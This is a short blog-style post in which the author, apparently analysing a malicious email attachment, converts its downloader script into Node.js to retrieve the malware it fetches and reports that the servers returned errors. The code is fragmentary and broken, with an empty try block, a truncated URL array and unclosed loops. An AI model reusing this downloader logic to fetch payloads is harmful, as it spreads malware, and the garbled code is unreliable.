Today I wanted to see what malware would be downloaded if someone opens the attachment of the decribed mail from the last post.

The windows script was simplified to a simple javascipt so it's easier to run on a linux machine:

var request = require("request");
var fs = require("fs");

function ge() { 
  var rt = 0; 
  try { 
  } catch(er){
  return rt; 

var i=0; 
var ll = new Array("", 
var x = "?a=228567&i=Y5rzyqa6RhRlpw19Jl94p4F1b4I22hWFQ0_HjXbKHychcZyn0b_kMs1eEwV0pM5uEJsjRyZ3a1bm7F-R2AJJb7coBJcrLA&r="; 

for(var n=1;n<=2;n++) { 
  while (i<ll.length) {
    console.log('trying to get ' + ll[i]) 

As it turned out, I was too slow :(. All servers responded with a not found for an 500 Internal Server Error.

Next time i'll be faster.